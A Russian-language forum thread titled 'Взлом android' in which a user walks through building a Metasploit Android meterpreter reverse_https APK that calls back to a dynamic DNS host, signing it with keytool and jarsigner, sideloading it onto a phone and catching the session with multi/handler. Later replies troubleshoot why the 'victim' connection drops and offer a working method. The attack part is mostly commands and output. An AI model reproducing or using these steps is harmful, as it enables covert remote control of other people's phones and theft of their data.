Взлом android: msfvenom -p android/...

veterok

Green Team
27.09.2016
15
8
BIT
7
Основу взял тут.
Предварительно пробросил 443 порт на роутере.
Создал АРК
Код:
msfvenom -p android/meterpreter/reverse_https LHOST=****.hldns.ru LPORT=443 R > example.apk

Затем создал подпись
Код:
keytool -genkey -v -keystore release-key.keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000

Подписал APK
Код:
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore /keys/release-key.keystore example.apk alias_name

Кинул АРК на телефон (пробовал на android 5.1 и android 4.2 результат одинаков). Все запустилось.

В терминале как обычно
Код:
msfconsole
...
msf > use multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_https
msf exploit(handler) > set LHOST 192.168.1.3
msf exploit(handler) > set LPORT 443
msf exploit(handler) > exploit

эксплоит стартует, но постояно пишет
Код:
Sending stage (957999 bytes) to 192.168.1.2
Sending stage (957999 bytes) to 192.168.1.2
Sending stage (957999 bytes) to 192.168.1.2
...
Sending stage (957999 bytes) to 192.168.1.2
Соединение так и не произошло!!

Аналогичные действия провожу в Armitage 1.4.11
И, мазаль тов!!!
Код:
meterpreter>
Но через пары команд жертва перестает реагировать.

В общем хочется разобраться в двух вопросах:
1. Почему в терминале не открылась сессия?
2. Почему через 10-15 мин. отваливается конект в Эрмитаже?
 
Последнее редактирование:
  • Нравится
Реакции: Unkown___

Aldo

One Level
16.08.2016
3
2
BIT
0
Ребят, кто знает, как узнать порт на вируальной машине?
прописывал ifconfig узнавал свой хост и вводил порт 4444 и при запуске апк ничего не происходило в чем проблема?
 

z3RoTooL

Grey Team
28.02.2016
803
697
BIT
9
Ребят, кто знает, как узнать порт на вируальной машине?
прописывал ifconfig узнавал свой хост и вводил порт 4444 и при запуске апк ничего не происходило в чем проблема?
может потому что виртуалку надо ставить в общую сеть, а не через NAT ?
 

<~DarkNode~>

~^M1st3r_Bert0ni^~
Platinum
19.10.2016
722
3 099
BIT
0
Сначала все нужно тестить на себе или эмуляторе,что бы наглядно видеть что происходить на стороне жертвы.Причин может быть много.Одна из - DroidWall ( или какой то фаерволл для андроида,обычно его ставят для блокировки рекламы на рутированых устройствах,хотя если речь идёт о рядомом юзере то эта версия отпадает)
Могу по желанию написать статью с рабочим методом через сборку из исходников.
 
O

OtherMan

под рукой был samsung galaxy s6 edge все делал по выше указанной инструкции такая же проблема (((
на LG полет нормальный )))
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!